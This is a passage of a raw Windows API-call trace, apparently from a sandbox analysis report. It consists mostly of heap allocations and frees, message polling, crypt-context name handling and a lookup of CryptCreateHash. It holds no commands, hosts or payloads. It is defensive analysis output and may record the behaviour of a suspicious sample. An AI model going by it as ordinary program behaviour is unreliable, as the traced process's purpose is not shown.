hHeap=0x970000) returned 1 [0250.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0250.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0250.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0250.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0250.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0250.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0250.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0250.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0250.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0250.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0250.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0250.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0250.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0250.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0250.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0250.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0250.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0250.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0250.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0250.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0250.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0250.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0250.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0250.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0250.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0250.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0250.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0250.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0250.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0250.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0250.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0250.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0250.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0250.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0250.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0250.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0250.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0250.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0250.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0250.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0250.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0250.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0250.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0250.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0250.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0250.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0250.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0250.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0250.932] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0250.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0250.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0250.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0250.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0250.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0250.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0250.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0250.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0250.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0250.933] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d88 [0250.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0250.933] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0250.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d88 | out: hHeap=0x970000) returned 1 [0250.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0250.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ee8 [0250.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0250.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0250.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0250.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0250.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0250.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0250.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51538 [0250.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0250.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0250.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0250.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0250.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0250.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0250.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0250.934] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0250.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0250.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0250.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0250.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0250.934] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0250.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0250.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0250.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0250.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0250.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0250.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0250.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0250.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0250.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0250.935] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0250.935] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0250.935] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0250.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0250.935] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0250.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0250.935] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0250.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0250.935] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0250.936] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0250.936] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0250.936] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0250.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0250.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0250.936] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0250.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e559d0 [0250.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0250.936] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0250.936] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0250.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0250.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0250.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0250.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0250.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0250.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0250.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0250.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0250.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0250.937] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0250.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0250.937] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0250.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0250.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0250.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0250.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0250.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0250.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0250.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0250.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0250.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0250.939] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0250.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0250.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0250.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0250.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0250.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0250.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0250.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0250.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0250.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0250.939] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0250.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0250.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0250.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0250.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0250.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0250.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0250.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0250.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0250.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0250.940] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0250.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0250.940] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0250.940] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0250.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0250.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0250.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0250.940] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0250.940] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0250.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0250.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0250.940] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0250.941] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0250.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0250.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0250.941] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0250.941] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0250.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0250.941] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0250.941] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0250.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0250.941] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0251.047] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0251.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0251.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0251.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0251.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f80 [0251.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0251.048] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0251.048] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0251.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0251.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0251.048] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0251.049] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0251.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0251.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0251.049] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0251.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0251.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0251.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0251.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0251.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0251.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51880, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0251.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0251.050] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0251.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0251.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0251.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0251.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0251.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0251.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0251.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0251.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0251.050] HeapFree (in: hHeap=0x970000, 